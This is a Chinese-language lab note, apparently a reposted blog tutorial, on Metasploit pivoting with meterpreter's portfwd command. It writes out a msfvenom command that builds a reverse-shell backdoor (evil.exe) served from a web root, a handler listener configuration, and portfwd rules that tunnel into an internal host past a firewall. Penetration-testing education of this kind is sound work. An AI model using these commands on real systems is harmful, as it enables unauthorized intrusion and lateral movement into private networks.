鄭重宣告:
本筆記撰寫目的只用于安全知識提升,并與更多人共享安全知識,切勿使用筆記中的技術進行違法活動,利用筆記中的技術造成的后果與作者本人無關,倡導維護網路安全人人有責,共同維護網路文明和諧,
Metasploit 跳板攻擊:portfwd 埠轉發與埠映射
- portfwd 原理
- 2 實驗環境
- 2.1 建立 meterpreter 反向連接
- 2.2 portfwd 埠轉發
- 2.3 portfwd 埠映射
portfwd 原理
- portfwd 是借用 meterpreter shell 建立的連接進行資料傳輸,達到埠轉發的目的,
- 當建立反向連接時,可以繞過防火墻的檢測,
meterpreter > portfwd --help
Usage: portfwd [-h] [add | delete | list | flush] [args]
OPTIONS:
-L <opt> Forward: local host to listen on (optional). Reverse: local host to connect to.
-R Indicates a reverse port forward.
-i <opt> Index of the port forward entry to interact with (see the "list" command).
-l <opt> Forward: local port to listen on. Reverse: local port to connect to.
-p <opt> Forward: remote port to connect to. Reverse: remote port to listen on.
-r <opt> Forward: remote host to connect to.
2 實驗環境

2.1 建立 meterpreter 反向連接
-
生成 Metaspolit 后門程式
msfvenom -p windows/meterpreter/reverse_tcp lhost=192.168.0.2 lport=4444 -f exe > /var/www/html/evil.exe -
kali 配置監聽 meterpreter 反向連接
use exploit/multi/handler set payload windows/meterpreter/reverse_tcp set lhost 192.168.0.2 run -
WEB Server 下載 Metaspolit 后門程式,并打開程式
-
meterpreter 反向連接建立成功

2.2 portfwd 埠轉發
-
配置 portwd 埠轉發
meterpreter > portfwd add -L 192.168.0.2 -l 18080 -p 80 -r 192.168.100.151 -
使用
portwd list查看是否建立埠轉發連接
-
驗證:

2.3 portfwd 埠映射
-
配置 portwd 埠轉發
meterpreter > portfwd add -l 12323 -p 23 -r 192.168.100.151 -
使用
portwd list查看是否建立埠映射連接
-
驗證:
┌──(kali?kali)-[~] └─$ ssh -p 12323 root@127.0.0.1
轉載請註明出處,本文鏈接:https://www.uj5u.com/qita/297517.html
標籤:其他
